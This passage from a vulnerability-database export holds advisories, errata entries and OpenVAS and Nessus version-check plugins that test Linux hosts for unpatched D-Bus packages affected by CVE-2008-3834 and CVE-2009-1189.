rpm:\"libdbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3-devel\", rpm:\"lib64dbus-1_3-devel~1.0.2~10.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2017-12-22T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:870201", "href": "http://plugins.openvas.org/nasl.php?oid=870201", "type": "openvas", "title": "RedHat Update for dbus RHSA-2010:0018-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dbus RHSA-2010:0018-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\n not correctly fix the denial of service flaw in the system for sending\n messages between applications. A local user could use this flaw to send a\n message with a malformed signature to the bus, causing the bus (and,\n consequently, any process using libdbus to receive messages) to abort.\n (CVE-2009-1189)\n \n Note: Users running any application providing services over the system\n message bus are advised to test this update carefully before deploying it\n in production environments.\n \n All users are advised to upgrade to these updated packages, which contain a\n backported patch to correct this issue. For the update to take effect, all\n running instances of dbus-daemon and all running applications using the\n libdbus library must be restarted, or the system rebooted.\";\n\ntag_affected = \"dbus on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00003.html\");\n script_id(870201);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0018-01\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2008-3834\");\n script_name(\"RedHat Update for dbus RHSA-2010:0018-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-debuginfo\", rpm:\"dbus-debuginfo~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.1.2~12.el5_4.1\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-libs\", rpm:\"dbus-libs~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.2~12.el5_4.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dbus-1\n dbus-1-devel\n dbus-1-glib\n dbus-1-gtk\n dbus-1-java\n dbus-1-mono\n dbus-1-python\n dbus-1-qt\n dbus-1-qt3\n dbus-1-qt3-devel\n dbus-1-x11\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65851", "href": "http://plugins.openvas.org/nasl.php?oid=65851", "type": "openvas", "title": "SLES10: Security update for dbus", "sourceData": "#\n#VID slesp2-dbus-1-5701\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dbus\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dbus-1\n dbus-1-devel\n dbus-1-glib\n dbus-1-gtk\n dbus-1-java\n dbus-1-mono\n dbus-1-python\n dbus-1-qt\n dbus-1-qt3\n dbus-1-qt3-devel\n dbus-1-x11\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65851);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3834\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"SLES10: Security update for dbus\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus-1\", rpm:\"dbus-1~0.60~33.20\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-devel\", rpm:\"dbus-1-devel~0.60~33.20\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-glib\", rpm:\"dbus-1-glib~0.60~33.20\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-gtk\", rpm:\"dbus-1-gtk~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-java\", rpm:\"dbus-1-java~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-mono\", rpm:\"dbus-1-mono~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-python\", rpm:\"dbus-1-python~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-qt\", rpm:\"dbus-1-qt~4.3.4~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-qt3\", rpm:\"dbus-1-qt3~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-qt3-devel\", rpm:\"dbus-1-qt3-devel~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-x11\", rpm:\"dbus-1-x11~0.60~33.23\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) 
{\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880669", "href": "http://plugins.openvas.org/nasl.php?oid=880669", "type": "openvas", "title": "CentOS Update for dbus CESA-2009:0008 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus CESA-2009:0008 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"D-Bus is a system for sending messages between applications. It is used for\n the system-wide message bus service and as a per-user-login-session\n messaging facility.\n\n A denial-of-service flaw was discovered in the system for sending messages\n between applications. 
A local user could send a message with a malformed\n signature to the bus causing the bus (and, consequently, any process using\n libdbus to receive messages) to abort. (CVE-2008-3834)\n \n All users are advised to upgrade to these updated dbus packages, which\n contain backported patch which resolve this issue. For the update to take\n effect, all running instances of dbus-daemon and all running applications\n using libdbus library must be restarted, or the system rebooted.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dbus on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-January/015530.html\");\n script_id(880669);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:0008\");\n script_cve_id(\"CVE-2008-3834\");\n script_name(\"CentOS Update for dbus CESA-2009:0008 centos5 i386\");\n\n script_summary(\"Check for the Version of dbus\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = 
\"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "description": "The remote host is missing updates to dbus announced in\nadvisory CESA-2009:0008.", "modified": "2017-07-10T00:00:00", "published": "2009-01-13T00:00:00", "id": "OPENVAS:63181", "href": "http://plugins.openvas.org/nasl.php?oid=63181", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:0008 (dbus)", "sourceData": "#CESA-2009:0008 63181 2\n# $Id: ovcesa2009_0008.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:0008 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:0008\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:0008\nhttps://rhn.redhat.com/errata/RHSA-2009-0008.html\";\ntag_summary = \"The remote host is missing updates to dbus announced in\nadvisory CESA-2009:0008.\";\n\n\n\nif(description)\n{\n script_id(63181);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-13 22:38:32 +0100 (Tue, 13 Jan 2009)\");\n script_cve_id(\"CVE-2008-3834\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:0008 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-devel\", rpm:\"dbus-devel~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.0.0~7.el5_2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "[1.1.2-12.el5_4.1]\n- CVE-2009-1189 dbus: invalid fix for CVE-2008-3834 ", "edition": 4, "modified": "2010-01-07T00:00:00", "published": "2010-01-07T00:00:00", "id": "ELSA-2010-0018", "href": "http://linux.oracle.com/errata/ELSA-2010-0018.html", "title": "dbus security update", "type": "oraclelinux", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "[1.0.0-7.el5_2.1]\n- CVE-2008-3834\n- Resolves: #466226", "edition": 4, "modified": "2009-01-07T00:00:00", "published": "2009-01-07T00:00:00", "id": "ELSA-2009-0008", "href": 
"http://linux.oracle.com/errata/ELSA-2009-0008.html", "title": "dbus security update", "type": "oraclelinux", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-01T04:36:12", "description": "From Red Hat Security Advisory 2010:0018 :\n\nUpdated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : dbus (ELSA-2010-0018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dbus", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:dbus-x11", "p-cpe:/a:oracle:linux:dbus-libs", "p-cpe:/a:oracle:linux:dbus-devel"], "id": "ORACLELINUX_ELSA-2010-0018.NASL", "href": "https://www.tenable.com/plugins/nessus/67981", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0018 and \n# Oracle Linux Security Advisory ELSA-2010-0018 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67981);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:08\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"RHSA\", value:\"2010:0018\");\n\n script_name(english:\"Oracle Linux 5 : dbus (ELSA-2010-0018)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0018 :\n\nUpdated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. 
It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-January/001309.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dbus packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"dbus-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-devel-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-libs-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus / dbus-devel / dbus-libs / dbus-x11\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T04:57:26", "description": "Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. 
(CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.", "edition": 26, "published": "2010-01-08T00:00:00", "title": "RHEL 5 : dbus (RHSA-2010:0018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:dbus-libs", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:dbus", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:dbus-devel", "p-cpe:/a:redhat:enterprise_linux:dbus-x11"], "id": "REDHAT-RHSA-2010-0018.NASL", "href": "https://www.tenable.com/plugins/nessus/43819", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0018. 
